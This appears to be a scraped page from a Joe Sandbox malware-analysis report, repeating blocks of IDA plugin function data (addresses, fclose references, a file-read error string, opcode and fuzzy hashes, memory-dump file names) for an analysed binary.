Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624

Function 00007FF764CC4988 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC497E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC4B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
Instruction ID: 4a05fdafed7e73f30e254f738c5bf47c04118800ba140e6ff2ba3c3a9247edb0
Opcode Fuzzy Hash: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
Instruction Fuzzy Hash: 7CF05E13B08A0381F973BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC4B0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
Instruction ID: 4a05fdafed7e73f30e254f738c5bf47c04118800ba140e6ff2ba3c3a9247edb0
Opcode Fuzzy Hash: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
Instruction Fuzzy Hash: 7CF05E13B08A0381F973BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC47B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC47A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC47D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624

Function 00007FF764CC47C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624

Function 00007FF764CC47BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624

Function 00007FF764CC4771 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624

Function 00007FF764CC4767 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC475D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC4B8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: dde45c4a61171a6f2f2a96ed9fe8fac32039376184f1b4fd4d8aaa71f1959305
Instruction ID: 87b7740fd858ff7aa1dd371923c778b127a61de36a90ce6830884930752b716d
Opcode Fuzzy Hash: dde45c4a61171a6f2f2a96ed9fe8fac32039376184f1b4fd4d8aaa71f1959305
Instruction Fuzzy Hash: 3FF05E13B08A0381F973BE0BB8D07B992412F81765EC995378D5C0BBD1EE3DA882C624

Function 00007FF764CC4785 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624

Function 00007FF764CC477B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624

Function 00007FF764CC4B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
